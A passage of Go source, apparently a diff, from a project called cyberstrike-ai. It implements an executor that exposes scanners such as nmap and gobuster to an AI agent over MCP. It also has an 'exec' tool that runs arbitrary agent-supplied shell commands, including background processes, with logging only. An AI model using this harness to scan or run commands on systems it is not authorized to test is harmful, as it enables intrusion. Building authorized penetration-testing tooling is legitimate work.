"context" + "encoding/json" + "fmt" + "io" + "os" + "os/exec" + "runtime" + "strconv" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/storage" + + "github.com/creack/pty" + "go.uber.org/zap" +) + +// ToolOutputCallback 用于在工具执行过程中把 stdout/stderr 增量推给上层(SSE)。 +// 通过 context 传递,避免修改 MCP ToolHandler 签名导致的“写死工具”问题。 +type ToolOutputCallback func(chunk string) + +type toolOutputCallbackCtxKey struct{} + +// ToolOutputCallbackCtxKey 是 context 中的 key,供 Agent 写入回调,Executor 读取并流式回调。 +var ToolOutputCallbackCtxKey = toolOutputCallbackCtxKey{} + +// Executor 安全工具执行器 +type Executor struct { + config *config.SecurityConfig + toolIndex map[string]*config.ToolConfig // 工具索引,用于 O(1) 查找 + mcpServer *mcp.Server + logger *zap.Logger + resultStorage ResultStorage // 结果存储(用于查询工具) +} + +// ResultStorage 结果存储接口(直接使用 storage 包的类型) +type ResultStorage interface { + SaveResult(executionID string, toolName string, result string) error + GetResult(executionID string) (string, error) + GetResultPage(executionID string, page int, limit int) (*storage.ResultPage, error) + SearchResult(executionID string, keyword string, useRegex bool) ([]string, error) + FilterResult(executionID string, filter string, useRegex bool) ([]string, error) + GetResultMetadata(executionID string) (*storage.ResultMetadata, error) + GetResultPath(executionID string) string + DeleteResult(executionID string) error +} + +// NewExecutor 创建新的执行器 +func NewExecutor(cfg *config.SecurityConfig, mcpServer *mcp.Server, logger *zap.Logger) *Executor { + executor := &Executor{ + config: cfg, + toolIndex: make(map[string]*config.ToolConfig), + mcpServer: mcpServer, + logger: logger, + resultStorage: nil, // 稍后通过 SetResultStorage 设置 + } + // 构建工具索引 + executor.buildToolIndex() + return executor +} + +// SetResultStorage 设置结果存储 +func (e *Executor) SetResultStorage(storage ResultStorage) { + e.resultStorage = storage +} + +// buildToolIndex 构建工具索引,将 O(n) 查找优化为 
O(1) +func (e *Executor) buildToolIndex() { + e.toolIndex = make(map[string]*config.ToolConfig) + for i := range e.config.Tools { + if e.config.Tools[i].Enabled { + e.toolIndex[e.config.Tools[i].Name] = &e.config.Tools[i] + } + } + e.logger.Info("工具索引构建完成", + zap.Int("totalTools", len(e.config.Tools)), + zap.Int("enabledTools", len(e.toolIndex)), + ) +} + +// ExecuteTool 执行安全工具 +func (e *Executor) ExecuteTool(ctx context.Context, toolName string, args map[string]interface{}) (*mcp.ToolResult, error) { + e.logger.Info("ExecuteTool被调用", + zap.String("toolName", toolName), + zap.Any("args", args), + ) + + // 特殊处理:exec工具直接执行系统命令 + if toolName == "exec" { + e.logger.Info("执行exec工具") + return e.executeSystemCommand(ctx, args) + } + + // 使用索引查找工具配置(O(1) 查找) + toolConfig, exists := e.toolIndex[toolName] + if !exists { + e.logger.Error("工具未找到或未启用", + zap.String("toolName", toolName), + zap.Int("totalTools", len(e.config.Tools)), + zap.Int("enabledTools", len(e.toolIndex)), + ) + return nil, fmt.Errorf("工具 %s 未找到或未启用", toolName) + } + + e.logger.Info("找到工具配置", + zap.String("toolName", toolName), + zap.String("command", toolConfig.Command), + zap.Strings("args", toolConfig.Args), + ) + + // 特殊处理:内部工具(command 以 "internal:" 开头) + if strings.HasPrefix(toolConfig.Command, "internal:") { + e.logger.Info("执行内部工具", + zap.String("toolName", toolName), + zap.String("command", toolConfig.Command), + ) + return e.executeInternalTool(ctx, toolName, toolConfig.Command, args) + } + + // 构建命令 - 根据工具类型使用不同的参数格式 + cmdArgs := e.buildCommandArgs(toolName, toolConfig, args) + + e.logger.Info("构建命令参数完成", + zap.String("toolName", toolName), + zap.Strings("cmdArgs", cmdArgs), + zap.Int("argsCount", len(cmdArgs)), + ) + + // 验证命令参数 + if len(cmdArgs) == 0 { + e.logger.Warn("命令参数为空", + zap.String("toolName", toolName), + zap.Any("inputArgs", args), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("错误: 工具 %s 缺少必需的参数。接收到的参数: %v", toolName, args), + }, + }, 
+ IsError: true, + }, nil + } + + // 执行命令 + cmd := exec.CommandContext(ctx, toolConfig.Command, cmdArgs...) + applyDefaultTerminalEnv(cmd) + _ = prepareShellCmdSession(cmd) + + e.logger.Info("执行安全工具", + zap.String("tool", toolName), + zap.Strings("args", cmdArgs), + ) + + var output string + var err error + // 如果上层提供了 stdout/stderr 增量回调,则边执行边读取并回调。 + if cb, ok := ctx.Value(ToolOutputCallbackCtxKey).(ToolOutputCallback); ok && cb != nil { + output, err = streamCommandOutput(ctx, cmd, cb) + if err != nil && shouldRetryWithPTY(output) { + e.logger.Info("检测到工具需要 TTY,使用 PTY 重试", + zap.String("tool", toolName), + ) + cmd2 := exec.CommandContext(ctx, toolConfig.Command, cmdArgs...) + applyDefaultTerminalEnv(cmd2) + _ = prepareShellCmdSession(cmd2) + output, err = runCommandWithPTY(ctx, cmd2, cb) + } + } else { + outputBytes, err2 := cmd.CombinedOutput() + output = string(outputBytes) + err = err2 + if err != nil && shouldRetryWithPTY(output) { + e.logger.Info("检测到工具需要 TTY,使用 PTY 重试", + zap.String("tool", toolName), + ) + cmd2 := exec.CommandContext(ctx, toolConfig.Command, cmdArgs...) 
+ applyDefaultTerminalEnv(cmd2) + _ = prepareShellCmdSession(cmd2) + output, err = runCommandWithPTY(ctx, cmd2, nil) + } + } + if err != nil { + // 检查退出码是否在允许列表中 + exitCode := getExitCode(err) + if exitCode != nil && toolConfig.AllowedExitCodes != nil { + for _, allowedCode := range toolConfig.AllowedExitCodes { + if *exitCode == allowedCode { + e.logger.Info("工具执行完成(退出码在允许列表中)", + zap.String("tool", toolName), + zap.Int("exitCode", *exitCode), + zap.String("output", string(output)), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: string(output), + }, + }, + IsError: false, + }, nil + } + } + } + + e.logger.Error("工具执行失败", + zap.String("tool", toolName), + zap.Error(err), + zap.Int("exitCode", getExitCodeValue(err)), + zap.String("output", string(output)), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("工具执行失败: %v\n输出: %s", err, string(output)), + }, + }, + IsError: true, + }, nil + } + + e.logger.Info("工具执行成功", + zap.String("tool", toolName), + zap.String("output", string(output)), + ) + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: string(output), + }, + }, + IsError: false, + }, nil +} + +// RegisterTools 注册工具到MCP服务器 +func (e *Executor) RegisterTools(mcpServer *mcp.Server) { + e.logger.Info("开始注册工具", + zap.Int("totalTools", len(e.config.Tools)), + zap.Int("enabledTools", len(e.toolIndex)), + ) + + // 重新构建索引(以防配置更新) + e.buildToolIndex() + + for i, toolConfig := range e.config.Tools { + if !toolConfig.Enabled { + e.logger.Debug("跳过未启用的工具", + zap.String("tool", toolConfig.Name), + ) + continue + } + + // 创建工具配置的副本,避免闭包问题 + toolName := toolConfig.Name + toolConfigCopy := toolConfig + + // 根据配置决定暴露给 AI/API 的描述:short_description 或 description + useFullDescription := strings.TrimSpace(strings.ToLower(e.config.ToolDescriptionMode)) == "full" + shortDesc := toolConfigCopy.ShortDescription + if shortDesc == "" { + // 如果没有简短描述,从详细描述中提取第一行或前10000个字符 + desc 
:= toolConfigCopy.Description + if len(desc) > 10000 { + if idx := strings.Index(desc, "\n"); idx > 0 && idx < 10000 { + shortDesc = strings.TrimSpace(desc[:idx]) + } else { + shortDesc = desc[:10000] + "..." + } + } else { + shortDesc = desc + } + } + if useFullDescription { + shortDesc = "" // 使用 description 时清空 ShortDescription,下游会回退到 Description + } + + tool := mcp.Tool{ + Name: toolConfigCopy.Name, + Description: toolConfigCopy.Description, + ShortDescription: shortDesc, + InputSchema: e.buildInputSchema(&toolConfigCopy), + } + + handler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + e.logger.Info("工具handler被调用", + zap.String("toolName", toolName), + zap.Any("args", args), + ) + return e.ExecuteTool(ctx, toolName, args) + } + + mcpServer.RegisterTool(tool, handler) + e.logger.Info("注册安全工具成功", + zap.String("tool", toolConfigCopy.Name), + zap.String("command", toolConfigCopy.Command), + zap.Int("index", i), + ) + } + + e.logger.Info("工具注册完成", + zap.Int("registeredCount", len(e.config.Tools)), + ) +} + +// buildCommandArgs 构建命令参数 +func (e *Executor) buildCommandArgs(toolName string, toolConfig *config.ToolConfig, args map[string]interface{}) []string { + cmdArgs := make([]string, 0) + + // 如果配置中定义了参数映射,使用配置中的映射规则 + if len(toolConfig.Parameters) > 0 { + // 检查是否有 scan_type 参数,如果有则替换默认的扫描类型参数 + hasScanType := false + var scanTypeValue string + if scanType, ok := args["scan_type"].(string); ok && scanType != "" { + hasScanType = true + scanTypeValue = scanType + } + + // 添加固定参数(如果指定了 scan_type,可能需要过滤掉默认的扫描类型参数) + if hasScanType && toolName == "nmap" { + // 对于 nmap,如果指定了 scan_type,跳过默认的 -sT -sV -sC + // 这些参数会被 scan_type 参数替换 + } else { + cmdArgs = append(cmdArgs, toolConfig.Args...) 
+ } + + // 按位置参数排序 + positionalParams := make([]config.ParameterConfig, 0) + flagParams := make([]config.ParameterConfig, 0) + + for _, param := range toolConfig.Parameters { + if param.Position != nil { + positionalParams = append(positionalParams, param) + } else { + flagParams = append(flagParams, param) + } + } + + // 对于需要子命令的工具(如 gobuster dir),position 0 必须紧跟在命令名后、所有 flag 之前 + for _, param := range positionalParams { + if param.Name == "additional_args" || param.Name == "scan_type" || param.Name == "action" { + continue + } + if param.Position != nil && *param.Position == 0 { + value := e.getParamValue(args, param) + if value == nil && param.Default != nil { + value = param.Default + } + if value != nil { + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + break + } + } + + // 处理标志参数 + for _, param := range flagParams { + // 跳过特殊参数,它们会在后面单独处理 + // action 参数仅用于工具内部逻辑,不传递给命令 + if param.Name == "additional_args" || param.Name == "scan_type" || param.Name == "action" { + continue + } + + value := e.getParamValue(args, param) + if value == nil { + if param.Required { + // 必需参数缺失,返回空数组让上层处理错误 + e.logger.Warn("缺少必需的标志参数", + zap.String("tool", toolName), + zap.String("param", param.Name), + ) + return []string{} + } + continue + } + + // 布尔值特殊处理:如果为 false,跳过;如果为 true,只添加标志 + if param.Type == "bool" { + var boolVal bool + var ok bool + + // 尝试多种类型转换 + if boolVal, ok = value.(bool); ok { + // 已经是布尔值 + } else if numVal, ok := value.(float64); ok { + // JSON 数字类型(float64) + boolVal = numVal != 0 + ok = true + } else if numVal, ok := value.(int); ok { + // int 类型 + boolVal = numVal != 0 + ok = true + } else if strVal, ok := value.(string); ok { + // 字符串类型 + boolVal = strVal == "true" || strVal == "1" || strVal == "yes" + ok = true + } + + if ok { + if !boolVal { + continue // false 时不添加任何参数 + } + // true 时只添加标志,不添加值 + if param.Flag != "" { + cmdArgs = append(cmdArgs, param.Flag) + } + continue + } + } + + format := param.Format + if format == "" { + format 
= "flag" // 默认格式 + } + + switch format { + case "flag": + // --flag value 或 -f value + if param.Flag != "" { + cmdArgs = append(cmdArgs, param.Flag) + } + formattedValue := e.formatParamValue(param, value) + if formattedValue != "" { + cmdArgs = append(cmdArgs, formattedValue) + } + case "combined": + // --flag=value 或 -f=value + if param.Flag != "" { + cmdArgs = append(cmdArgs, fmt.Sprintf("%s=%s", param.Flag, e.formatParamValue(param, value))) + } else { + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + case "template": + // 使用模板字符串 + if param.Template != "" { + template := param.Template + template = strings.ReplaceAll(template, "{flag}", param.Flag) + template = strings.ReplaceAll(template, "{value}", e.formatParamValue(param, value)) + template = strings.ReplaceAll(template, "{name}", param.Name) + cmdArgs = append(cmdArgs, strings.Fields(template)...) + } else { + // 如果没有模板,使用默认格式 + if param.Flag != "" { + cmdArgs = append(cmdArgs, param.Flag) + } + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + case "positional": + // 位置参数(已在上面处理) + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + default: + // 默认:直接添加值 + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + } + + // 然后处理位置参数(位置参数通常在标志参数之后) + // 对位置参数按位置排序 + // 首先找到最大的位置值,确定需要处理多少个位置 + maxPosition := -1 + for _, param := range positionalParams { + if param.Position != nil && *param.Position > maxPosition { + maxPosition = *param.Position + } + } + + // 按位置顺序处理参数,确保即使某些位置没有参数或使用默认值,也能正确传递 + // position 0 已在前面插入(子命令优先),此处从 1 开始 + for i := 0; i <= maxPosition; i++ { + if i == 0 { + continue + } + for _, param := range positionalParams { + // 跳过特殊参数,它们会在后面单独处理 + // action 参数仅用于工具内部逻辑,不传递给命令 + if param.Name == "additional_args" || param.Name == "scan_type" || param.Name == "action" { + continue + } + + if param.Position != nil && *param.Position == i { + value := e.getParamValue(args, param) + if value == nil { + if param.Required { + // 
必需参数缺失,返回空数组让上层处理错误 + e.logger.Warn("缺少必需的位置参数", + zap.String("tool", toolName), + zap.String("param", param.Name), + zap.Int("position", *param.Position), + ) + return []string{} + } + // 对于非必需参数,如果值为 nil,尝试使用默认值 + if param.Default != nil { + value = param.Default + } else { + // 如果没有默认值,跳过这个位置,继续处理下一个位置 + break + } + } + // 只有当值不为 nil 时才添加到命令参数中 + if value != nil { + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + break + } + } + // 如果某个位置没有找到对应的参数,继续处理下一个位置 + // 这样可以确保位置参数的顺序正确 + } + + // 特殊处理:additional_args 参数(需要按空格分割成多个参数) + if additionalArgs, ok := args["additional_args"].(string); ok && additionalArgs != "" { + // 按空格分割,但保留引号内的内容 + additionalArgsList := e.parseAdditionalArgs(additionalArgs) + cmdArgs = append(cmdArgs, additionalArgsList...) + } + + // 特殊处理:scan_type 参数(需要按空格分割并插入到合适位置) + if hasScanType { + scanTypeArgs := e.parseAdditionalArgs(scanTypeValue) + if len(scanTypeArgs) > 0 { + // 对于 nmap,scan_type 应该替换默认的扫描类型参数 + // 由于我们已经跳过了默认的 args,现在需要将 scan_type 插入到合适位置 + // 找到 target 参数的位置(通常是最后一个位置参数) + insertPos := len(cmdArgs) + for i := len(cmdArgs) - 1; i >= 0; i-- { + // target 通常是最后一个非标志参数 + if !strings.HasPrefix(cmdArgs[i], "-") { + insertPos = i + break + } + } + // 在 target 之前插入 scan_type 参数 + newArgs := make([]string, 0, len(cmdArgs)+len(scanTypeArgs)) + newArgs = append(newArgs, cmdArgs[:insertPos]...) + newArgs = append(newArgs, scanTypeArgs...) + newArgs = append(newArgs, cmdArgs[insertPos:]...) + cmdArgs = newArgs + } + } + + return cmdArgs + } + + // 如果没有定义参数配置,使用固定参数和通用处理 + // 添加固定参数 + cmdArgs = append(cmdArgs, toolConfig.Args...) 
+ + // 通用处理:将参数转换为命令行参数 + for key, value := range args { + if key == "_tool_name" { + continue + } + // 使用 --key value 格式 + cmdArgs = append(cmdArgs, fmt.Sprintf("--%s", key)) + if strValue, ok := value.(string); ok { + cmdArgs = append(cmdArgs, strValue) + } else { + cmdArgs = append(cmdArgs, fmt.Sprintf("%v", value)) + } + } + + return cmdArgs +} + +// parseAdditionalArgs 解析 additional_args 字符串,按空格分割但保留引号内的内容 +func (e *Executor) parseAdditionalArgs(argsStr string) []string { + if argsStr == "" { + return []string{} + } + + result := make([]string, 0) + var current strings.Builder + inQuotes := false + var quoteChar rune + escapeNext := false + + runes := []rune(argsStr) + for i := 0; i < len(runes); i++ { + r := runes[i] + + if escapeNext { + current.WriteRune(r) + escapeNext = false + continue + } + + if r == '\\' { + // 检查下一个字符是否是引号 + if i+1 < len(runes) && (runes[i+1] == '"' || runes[i+1] == '\'') { + // 转义的引号:跳过反斜杠,将引号作为普通字符写入 + i++ + current.WriteRune(runes[i]) + } else { + // 其他转义字符:写入反斜杠,下一个字符会在下次迭代处理 + escapeNext = true + current.WriteRune(r) + } + continue + } + + if !inQuotes && (r == '"' || r == '\'') { + inQuotes = true + quoteChar = r + continue + } + + if inQuotes && r == quoteChar { + inQuotes = false + quoteChar = 0 + continue + } + + if !inQuotes && (r == ' ' || r == '\t' || r == '\n') { + if current.Len() > 0 { + result = append(result, current.String()) + current.Reset() + } + continue + } + + current.WriteRune(r) + } + + // 处理最后一个参数(如果存在) + if current.Len() > 0 { + result = append(result, current.String()) + } + + // 如果解析结果为空,使用简单的空格分割作为降级方案 + if len(result) == 0 { + result = strings.Fields(argsStr) + } + + return result +} + +// getParamValue 获取参数值,支持默认值 +func (e *Executor) getParamValue(args map[string]interface{}, param config.ParameterConfig) interface{} { + // 从参数中获取值 + if value, ok := args[param.Name]; ok && value != nil { + return value + } + + // 如果参数是必需的但没有提供,返回 nil(让上层处理错误) + if param.Required { + return nil + } + + // 返回默认值 + return 
param.Default +} + +// formatParamValue 格式化参数值 +func (e *Executor) formatParamValue(param config.ParameterConfig, value interface{}) string { + switch param.Type { + case "bool": + // 布尔值应该在上层处理,这里不应该被调用 + if boolVal, ok := value.(bool); ok { + return fmt.Sprintf("%v", boolVal) + } + return "false" + case "array": + // 数组:转换为逗号分隔的字符串 + if arr, ok := value.([]interface{}); ok { + strs := make([]string, 0, len(arr)) + for _, item := range arr { + strs = append(strs, fmt.Sprintf("%v", item)) + } + return strings.Join(strs, ",") + } + return fmt.Sprintf("%v", value) + case "object": + // 对象/字典:序列化为 JSON 字符串 + if jsonBytes, err := json.Marshal(value); err == nil { + return string(jsonBytes) + } + // 如果 JSON 序列化失败,回退到默认格式化 + return fmt.Sprintf("%v", value) + default: + formattedValue := fmt.Sprintf("%v", value) + // 特殊处理:对于 ports 参数(通常是 nmap 等工具的端口参数),清理空格 + // nmap 不接受端口列表中有空格,例如 "80,443, 22" 应该变成 "80,443,22" + if param.Name == "ports" { + // 移除所有空格,但保留逗号和其他字符 + formattedValue = strings.ReplaceAll(formattedValue, " ", "") + } + return formattedValue + } +} + +// IsBackgroundShellCommand 检测命令是否为完全后台命令(末尾有独立 &,且不在引号内)。 +// command1 & command2 不算完全后台(command2 仍在前台执行)。 +func IsBackgroundShellCommand(command string) bool { + // 移除首尾空格 + command = strings.TrimSpace(command) + if command == "" { + return false + } + + // 检查命令中所有不在引号内的 & 符号 + // 找到最后一个 & 符号,检查它是否在命令末尾 + inSingleQuote := false + inDoubleQuote := false + escaped := false + lastAmpersandPos := -1 + + for i, r := range command { + if escaped { + escaped = false + continue + } + if r == '\\' { + escaped = true + continue + } + if r == '\'' && !inDoubleQuote { + inSingleQuote = !inSingleQuote + continue + } + if r == '"' && !inSingleQuote { + inDoubleQuote = !inDoubleQuote + continue + } + if r == '&' && !inSingleQuote && !inDoubleQuote { + // 检查 & 前后是否有空格或换行(确保是独立的 &,而不是变量名的一部分) + isStandalone := false + + // 检查前面:空格、制表符、换行符,或者是命令开头 + if i == 0 { + isStandalone = true + } else { + prev := command[i-1] + if prev == ' 
' || prev == '\t' || prev == '\n' || prev == '\r' { + isStandalone = true + } + } + + // 检查后面:空格、制表符、换行符,或者是命令末尾 + if isStandalone { + if i == len(command)-1 { + // 在末尾,肯定是独立的 & + lastAmpersandPos = i + } else { + next := command[i+1] + if next == ' ' || next == '\t' || next == '\n' || next == '\r' { + // 后面有空格,是独立的 & + lastAmpersandPos = i + } + } + } + } + } + + // 如果没有找到 & 符号,不是后台命令 + if lastAmpersandPos == -1 { + return false + } + + // 检查最后一个 & 后面是否还有非空内容 + afterAmpersand := strings.TrimSpace(command[lastAmpersandPos+1:]) + if afterAmpersand == "" { + // & 在末尾或后面只有空白字符,这是完全后台命令 + // 检查 & 前面是否有内容 + beforeAmpersand := strings.TrimSpace(command[:lastAmpersandPos]) + return beforeAmpersand != "" + } + + // 如果 & 后面还有非空内容,说明是 command1 & command2 的情况 + // 这种情况下,command2会在前台执行,所以不算完全后台命令 + return false +} + +// executeSystemCommand 执行系统命令 +func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + // 获取命令 + command, ok := args["command"].(string) + if !ok { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: 缺少command参数", + }, + }, + IsError: true, + }, nil + } + + if command == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: command参数不能为空", + }, + }, + IsError: true, + }, nil + } + + // 安全检查:记录执行的命令 + e.logger.Warn("执行系统命令", + zap.String("command", command), + ) + + // 获取shell类型(可选,默认为sh) + shell := "sh" + if s, ok := args["shell"].(string); ok && s != "" { + shell = s + } + + // 获取工作目录(可选) + workDir := "" + if wd, ok := args["workdir"].(string); ok && wd != "" { + workDir = wd + } + + // 检测是否为后台命令(包含 & 符号,但不在引号内) + isBackground := IsBackgroundShellCommand(command) + + // 构建命令 + var cmd *exec.Cmd + if workDir != "" { + cmd = exec.CommandContext(ctx, shell, "-c", command) + cmd.Dir = workDir + } else { + cmd = exec.CommandContext(ctx, shell, "-c", command) + } + applyDefaultTerminalEnv(cmd) + _ = prepareShellCmdSession(cmd) + + // 执行命令 
+ e.logger.Info("执行系统命令", + zap.String("command", command), + zap.String("shell", shell), + zap.String("workdir", workDir), + zap.Bool("isBackground", isBackground), + ) + + // 如果是后台命令,使用特殊处理来获取实际的后台进程PID + if isBackground { + // 移除命令末尾的 & 符号 + commandWithoutAmpersand := strings.TrimSuffix(strings.TrimSpace(command), "&") + commandWithoutAmpersand = strings.TrimSpace(commandWithoutAmpersand) + + // 构建新命令:将用户命令置于独立重定向的后台作业,再 echo $pid。 + // 若子进程与 echo 共享同一 stdout 管道,且长时间不向 stdout 写入换行, + // bufio.ReadString('\n') 会永久阻塞(例如 beacon 持续写二进制/单行日志)。 + pidCommand := fmt.Sprintf("%s /dev/null 2>&1 & pid=$!; echo $pid", commandWithoutAmpersand) + + // 创建新命令来获取PID + var pidCmd *exec.Cmd + if workDir != "" { + pidCmd = exec.CommandContext(ctx, shell, "-c", pidCommand) + pidCmd.Dir = workDir + } else { + pidCmd = exec.CommandContext(ctx, shell, "-c", pidCommand) + } + applyDefaultTerminalEnv(pidCmd) + _ = prepareShellCmdSession(pidCmd) + + // 获取stdout管道 + stdout, err := pidCmd.StdoutPipe() + if err != nil { + e.logger.Error("创建stdout管道失败", + zap.String("command", command), + zap.Error(err), + ) + // 如果创建管道失败,使用shell进程的PID作为fallback + if err := pidCmd.Start(); err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("后台命令启动失败: %v", err), + }, + }, + IsError: true, + }, nil + } + pid := pidCmd.Process.Pid + go pidCmd.Wait() // 在后台等待,避免僵尸进程 + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("后台命令已启动\n命令: %s\n进程ID: %d (可能不准确,获取PID失败)\n\n注意: 后台进程将继续运行,不会等待其完成。", command, pid), + }, + }, + IsError: false, + }, nil + } + + // 启动命令 + if err := pidCmd.Start(); err != nil { + stdout.Close() + e.logger.Error("后台命令启动失败", + zap.String("command", command), + zap.Error(err), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("后台命令启动失败: %v", err), + }, + }, + IsError: true, + }, nil + } + + // 读取第一行输出(PID) + reader := bufio.NewReader(stdout) + pidLine, err := 
reader.ReadString('\n') + stdout.Close() + + var actualPid int + if err != nil && err != io.EOF { + e.logger.Warn("读取后台进程PID失败", + zap.String("command", command), + zap.Error(err), + ) + // 如果读取失败,使用shell进程的PID + actualPid = pidCmd.Process.Pid + } else { + // 解析PID + pidStr := strings.TrimSpace(pidLine) + if parsedPid, err := strconv.Atoi(pidStr); err == nil { + actualPid = parsedPid + } else { + e.logger.Warn("解析后台进程PID失败", + zap.String("command", command), + zap.String("pidLine", pidStr), + zap.Error(err), + ) + // 如果解析失败,使用shell进程的PID + actualPid = pidCmd.Process.Pid + } + } + + // 在goroutine中等待shell进程,避免僵尸进程 + go func() { + if err := pidCmd.Wait(); err != nil { + e.logger.Debug("后台命令shell进程执行完成", + zap.String("command", command), + zap.Error(err), + ) + } + }() + + e.logger.Info("后台命令已启动", + zap.String("command", command), + zap.Int("actualPid", actualPid), + ) + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("后台命令已启动\n命令: %s\n进程ID: %d\n\n注意: 后台进程将继续运行,不会等待其完成。", command, actualPid), + }, + }, + IsError: false, + }, nil + } + + // 非后台命令:等待输出 + var output string + var err error + // 若上层提供工具输出增量回调,则边执行边流式读取。 + if cb, ok := ctx.Value(ToolOutputCallbackCtxKey).(ToolOutputCallback); ok && cb != nil { + output, err = streamCommandOutput(ctx, cmd, cb) + if err != nil && shouldRetryWithPTY(output) { + e.logger.Info("检测到系统命令需要 TTY,使用 PTY 重试") + cmd2 := exec.CommandContext(ctx, shell, "-c", command) + if workDir != "" { + cmd2.Dir = workDir + } + applyDefaultTerminalEnv(cmd2) + _ = prepareShellCmdSession(cmd2) + output, err = runCommandWithPTY(ctx, cmd2, cb) + } + } else { + outputBytes, err2 := cmd.CombinedOutput() + output = string(outputBytes) + err = err2 + if err != nil && shouldRetryWithPTY(output) { + e.logger.Info("检测到系统命令需要 TTY,使用 PTY 重试") + cmd2 := exec.CommandContext(ctx, shell, "-c", command) + if workDir != "" { + cmd2.Dir = workDir + } + applyDefaultTerminalEnv(cmd2) + _ = prepareShellCmdSession(cmd2) + output, 
err = runCommandWithPTY(ctx, cmd2, nil) + } + } + if err != nil { + e.logger.Error("系统命令执行失败", + zap.String("command", command), + zap.Error(err), + zap.String("output", string(output)), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("命令执行失败: %v\n输出: %s", err, string(output)), + }, + }, + IsError: true, + }, nil + } + + e.logger.Info("系统命令执行成功", + zap.String("command", command), + zap.String("output_length", fmt.Sprintf("%d", len(output))), + ) + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: string(output), + }, + }, + IsError: false, + }, nil +} + +// streamCommandOutput 以“边读边回调”的方式读取命令 stdout/stderr。 +// 使用定长块读取,避免按行读取在无换行输出时永久阻塞;ctx 取消时终止进程树。 +func streamCommandOutput(ctx context.Context, cmd *exec.Cmd, cb ToolOutputCallback) (string, error) { + if err := prepareShellCmdSession(cmd); err != nil { + return "", err + } + stdoutPipe, err := cmd.StdoutPipe() + if err != nil { + return "", err + } + stderrPipe, err := cmd.StderrPipe() + if err != nil { + _ = stdoutPipe.Close() + return "", err + } + if err := cmd.Start(); err != nil { + _ = stdoutPipe.Close() + _ = stderrPipe.Close() + return "", err + } + + stopWatch := make(chan struct{}) + go func() { + select { + case <-ctx.Done(): + terminateCmdTree(cmd) + case <-stopWatch: + } + }() + defer close(stopWatch) + + chunks := make(chan string, 64) + var wg sync.WaitGroup + readFn := func(r io.Reader) { + defer wg.Done() + buf := make([]byte, 8192) + for { + n, readErr := r.Read(buf) + if n > 0 { + chunks <- string(buf[:n]) + } + if readErr != nil { + return + } + } + } + + wg.Add(2) + go readFn(stdoutPipe) + go readFn(stderrPipe) + + go func() { + wg.Wait() + close(chunks) + }() + + var outBuilder strings.Builder + var deltaBuilder strings.Builder + lastFlush := time.Now() + + flush := func() { + if deltaBuilder.Len() == 0 { + return + } + cb(deltaBuilder.String()) + deltaBuilder.Reset() + lastFlush = time.Now() + } + + for chunk := 
range chunks { + outBuilder.WriteString(chunk) + deltaBuilder.WriteString(chunk) + // 简单节流:buffer 大于 2KB 或 200ms 就刷新一次 + if deltaBuilder.Len() >= 2048 || time.Since(lastFlush) >= 200*time.Millisecond { + flush() + } + } + flush() + + // 等待命令结束,返回最终退出状态 + waitErr := cmd.Wait() + return outBuilder.String(), waitErr +} + +// applyDefaultTerminalEnv 为外部工具补齐常见的终端环境变量。 +// 注意:这不会创建 TTY,只是减少某些工具在非交互环境下的“奇怪排版/检测失败”。 +func applyDefaultTerminalEnv(cmd *exec.Cmd) { + if cmd == nil { + return + } + // 仅在未显式设置 Env 时,继承当前进程环境 + if cmd.Env == nil { + cmd.Env = os.Environ() + } + // 如果用户已设置 TERM/COLUMNS/LINES,则不覆盖 + has := func(k string) bool { + prefix := k + "=" + for _, e := range cmd.Env { + if strings.HasPrefix(e, prefix) { + return true + } + } + return false + } + if !has("TERM") { + cmd.Env = append(cmd.Env, "TERM=xterm-256color") + } + if !has("COLUMNS") { + cmd.Env = append(cmd.Env, "COLUMNS=256") + } + if !has("LINES") { + cmd.Env = append(cmd.Env, "LINES=40") + } +} + +func shouldRetryWithPTY(output string) bool { + o := strings.ToLower(output) + // autorecon / python termios 常见报错 + if strings.Contains(o, "inappropriate ioctl for device") { + return true + } + if strings.Contains(o, "termios.error") { + return true + } + // 兜底:stdin 不是 tty + if strings.Contains(o, "not a tty") { + return true + } + return false +} + +// runCommandWithPTY 为子进程分配 PTY,适配需要交互式终端的工具(如 autorecon)。 +// 若 cb != nil,将持续回调增量输出(用于 SSE)。 +func runCommandWithPTY(ctx context.Context, cmd *exec.Cmd, cb ToolOutputCallback) (string, error) { + if runtime.GOOS == "windows" { + // PTY 方案为类 Unix;Windows 走原逻辑 + if cb != nil { + return streamCommandOutput(ctx, cmd, cb) + } + _ = prepareShellCmdSession(cmd) + out, err := cmd.CombinedOutput() + return string(out), err + } + + _ = prepareShellCmdSession(cmd) + ptmx, err := pty.Start(cmd) + if err != nil { + return "", err + } + defer func() { _ = ptmx.Close() }() + + // ctx 取消时尽快终止子进程 + done := make(chan struct{}) + go func() { + select { + case <-ctx.Done(): 
